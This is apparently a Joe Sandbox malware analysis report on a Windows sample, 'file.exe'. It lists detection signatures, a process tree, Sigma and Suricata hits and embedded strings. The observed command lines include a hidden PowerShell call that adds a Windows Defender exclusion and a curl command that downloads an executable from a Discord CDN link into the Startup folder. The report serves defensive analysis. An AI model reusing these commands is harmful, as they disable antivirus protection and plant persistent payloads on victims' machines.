Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1555565
MD5:8fb77810c61e160a657298815346996e
SHA1:4268420571bb1a858bc6a9744c0742d6fd738a83
SHA256:a0840c581f8f1d606fdc43bc98bd386755433bf1fb36647ecf2165eea433ff66
Tags:exeuser-Bitsight
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops PE files to the startup folder
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • file.exe (PID: 3472 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8FB77810C61E160A657298815346996E)
    • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6536 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Users\user\AppData\Local\Temp\decrypted_executable.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • decrypted_executable.exe (PID: 6416 cmdline: C:\Users\user\AppData\Local\Temp\decrypted_executable.exe MD5: 488192B42924057D251CC3D5212DC451)
        • cmd.exe (PID: 1088 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\ED33.tmp\ED34.tmp\ED35.bat C:\Users\user\AppData\Local\Temp\decrypted_executable.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1532 cmdline: powershell -w hidden -c Add-MpPreference -ExclusionPath "" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • curl.exe (PID: 6760 cmdline: curl --silent --output "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
          • DataStore1.exe (PID: 7104 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe" MD5: 419576A88D2EB1B14DF6EC22F7579C67)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -w hidden -c Add-MpPreference -ExclusionPath "", CommandLine: powershell -w hidden -c Add-MpPreference -ExclusionPath "", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\ED33.tmp\ED34.tmp\ED35.bat C:\Users\user\AppData\Local\Temp\decrypted_executable.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1088, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -w hidden -c Add-MpPreference -ExclusionPath "", ProcessId: 1532, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -w hidden -c Add-MpPreference -ExclusionPath "", CommandLine: powershell -w hidden -c Add-MpPreference -ExclusionPath "", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\ED33.tmp\ED34.tmp\ED35.bat C:\Users\user\AppData\Local\Temp\decrypted_executable.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1088, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -w hidden -c Add-MpPreference -ExclusionPath "", ProcessId: 1532, ProcessName: powershell.exe
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\curl.exe, ProcessId: 6760, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl --silent --output "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&", CommandLine: curl --silent --output "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\ED33.tmp\ED34.tmp\ED35.bat C:\Users\user\AppData\Local\Temp\decrypted_executable.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1088, ParentProcessName: cmd.exe, ProcessCommandLine: curl --silent --output "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&", ProcessId: 6760, ProcessName: curl.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w hidden -c Add-MpPreference -ExclusionPath "", CommandLine: powershell -w hidden -c Add-MpPreference -ExclusionPath "", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\ED33.tmp\ED34.tmp\ED35.bat C:\Users\user\AppData\Local\Temp\decrypted_executable.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1088, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -w hidden -c Add-MpPreference -ExclusionPath "", ProcessId: 1532, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-14T05:15:21.575253+010020229301A Network Trojan was detected4.175.87.197443192.168.2.549709TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeVirustotal: Detection: 36%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.6% probability
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb source: file.exe, 00000000.00000000.2075118983.00007FF67BE59000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF7725B9000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb) source: file.exe, 00000000.00000000.2075118983.00007FF67BE59000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF7725B9000.00000002.00000001.01000000.00000006.sdmp
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeFile opened: C:\Users\user\AppData\Local\Temp\ED33.tmp\ED34.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeFile opened: C:\Users\user\AppData\Local\Temp\ED33.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeFile opened: C:\Users\user\AppData\Local\Temp\ED33.tmp\ED34.tmp\ED35.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeFile opened: C:\Users\user\Jump to behavior
Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49709
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff& HTTP/1.1Host: cdn.discordapp.comUser-Agent: curl/7.83.1Accept: */*
Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://.css
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://.jpg
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://html4/loose.dtd
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://narwhaljs.org)
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://userguide.icu-project.org/strings/properties
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
Source: DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
Source: DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10704
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=6593
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
Source: decrypted_executable.exeString found in binary or memory: https://cdn.discordapp.co
Source: curl.exe, 00000008.00000002.2382452947.0000027ACC874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2413111118.000001EBEEA01000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
Source: DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/v8/7848
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/v8/8520
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://encoding.spec.whatwg.org
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412639214.0000019143401000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/WICG/scheduling-apis
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/acornjs/acorn/issues/575
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412639214.0000019143401000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/antirez/linenoise
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412639214.0000019143401000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/chalk/supports-color
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
